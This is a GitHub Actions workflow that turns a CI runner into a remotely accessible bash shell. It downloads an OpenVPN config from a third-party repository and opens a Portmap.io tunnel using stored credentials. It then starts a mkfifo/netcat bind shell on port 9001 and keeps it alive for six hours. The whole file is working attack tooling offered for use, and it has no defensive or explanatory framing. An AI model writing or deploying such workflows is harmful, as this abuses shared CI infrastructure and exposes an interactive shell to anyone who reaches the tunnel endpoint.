name: Bash Reverse Shell with Portmap.io (Updated Tunnel - Listening Shell)

on:
  push:
  workflow_dispatch:

jobs:
  build:
    runs-on: ubuntu-latest
    timeout-minutes: 360

    steps:
      - uses: actions/checkout@v4

      - name: Install Dependencies
        run: |
          sudo apt update
          sudo apt install -y openvpn netcat-openbsd wget

      - name: Download OpenVPN Configuration
        run: |
          echo "=== Downloading OpenVPN Configuration ==="
          wget https://raw.githubusercontent.com/lust001/openvpn/refs/heads/main/vpsfree9009.anonymous1.ovpn -O anonymous1-22216.ovpn
          ls -l

      - name: Configure Portmap.io Tunnel
        env:
          PORTMAP_USERNAME: ${{ secrets.PORTMAP_USERNAME }}
          PORTMAP_PASSWORD: ${{ secrets.PORTMAP_PASSWORD }}
        run: |
          echo "=== Setting up Portmap.io tunnel ==="
          # Save OpenVPN auth file
          echo "$PORTMAP_USERNAME" > auth.txt
          echo "$PORTMAP_PASSWORD" >> auth.txt
          sudo chmod 600 auth.txt
          # Update OpenVPN config to use auth file
          sudo sed -i '/auth-user-pass/c\auth-user-pass auth.txt' anonymous1-22216.ovpn
          # Start OpenVPN tunnel
          sudo openvpn --config anonymous1-22216.ovpn --daemon
          sleep 10
          echo "=== OpenVPN Status ==="
          ps aux | grep '[o]penvpn' || echo "No OpenVPN process found"
          echo "=== Tunnel Endpoint ==="
          echo "tcp://vpsfree9009-22216.portmap.io:22216"

      - name: Start Bash Reverse Shell (Listening)
        run: |
          echo "=== Starting reverse shell (listening) ==="
          # Start netcat in listening mode on port 9001 and execute bash upon connection
          mkfifo /tmp/backpipe
          /bin/bash -i < /tmp/backpipe 2>&1 | nc -lvnp 9001 > /tmp/backpipe &
          sleep 5
          ps aux | grep '[n]c -lvnp 9001' || echo "Netcat listening process not found"
          echo "=== Netcat is listening on port 9001. Connect to tcp://vpsfree9009-22216.portmap.io:22216 from your local machine ==="
          # Keep workflow alive for 6 hours
          for i in {1..360}; do
            ps aux | grep '[n]c -lvnp 9001' || echo "Netcat listening process stopped"
            ps aux | grep '[o]penvpn' || echo "OpenVPN process stopped"
            sleep 60
          done
